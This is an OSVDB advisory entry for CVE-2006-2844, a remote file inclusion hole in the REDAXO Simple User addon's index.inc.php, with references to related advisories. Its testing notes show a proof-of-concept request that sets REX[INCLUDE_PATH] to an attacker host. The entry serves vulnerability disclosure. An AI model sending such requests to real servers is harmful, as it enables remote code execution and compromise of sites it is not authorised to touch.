REDAXO Simple User Addon index.inc.php REX[INCLUDE_PATH] Variable Remote File Inclusion

2006-06-01T09:05:16
ID OSVDB:25956
Type osvdb
Reporter OSVDB
Modified 2006-06-01T09:05:16

Description

Manual Testing Notes

./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

References:

Vendor URL: http://www.redaxo.de/
Secunia Advisory ID: 20395
Related OSVDB ID: 25959
Related OSVDB ID: 25955
Related OSVDB ID: 25957
Related OSVDB ID: 25958
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0730.html
Generic Exploit URL: http://milw0rm.com/exploits/1861
FrSIRT Advisory: ADV-2006-2109
CVE-2006-2844